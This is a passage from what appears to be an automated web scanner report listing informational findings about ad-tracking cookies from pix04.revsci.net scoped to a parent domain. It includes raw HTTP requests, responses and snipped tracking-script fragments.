NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl+HSaKI0VkQza9E=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:12 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a0&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:12 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:12 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.185. http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/669682607.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV6GSaeI0VkRfa9g=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:56 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6490&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:56 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/669682607.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV6GSaeI0VkRfa9g=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:56 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6490&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:56 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:55 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.186. http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/669682607.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDwa7OC9yFSaGM1VkTLa+A=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:14 GMT; Path=/
rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:14 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/669682607.js?D=DM_LOC%3Dabout%253Ablank%253F_rsiL%253D0%26DM_EOM%3D1&C=F08747 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: pix04.revsci.net
Cookie: NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30zv0tYD6wb/nfBD4w==; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDwa7OC9yFSaGM1VkTLa+A=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:14 GMT; Path=/
Set-Cookie: rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:14 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:13:14 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.187. http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/686809393.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDwa7MC90GTCMM0VkS2a+I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:16:39 GMT; Path=/
rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:16:39 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/686809393.js?D=DM_LOC%3Dabout%253Ablank%253F_rsiL%253D0%26DM_EOM%3D1&C=F08747 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: pix04.revsci.net
Cookie: NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30zv0tYD6wb/nfBD4w==; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDwa7MC90GTCMM0VkS2a+I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:16:39 GMT; Path=/
Set-Cookie: rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:16:39 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:16:38 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.188. http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/686809393.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl0DSCeM1VkQwa9U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:08 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e649c&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:08 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/686809393.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl0DSCeM1VkQwa9U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:08 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e649c&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:07 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.189. http://pix04.revsci.net/F08747/b3/0/3/1003161/70794208.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/70794208.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LClyHSCCM0VkQwa9Y=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:14 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a2&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:14 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/70794208.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; 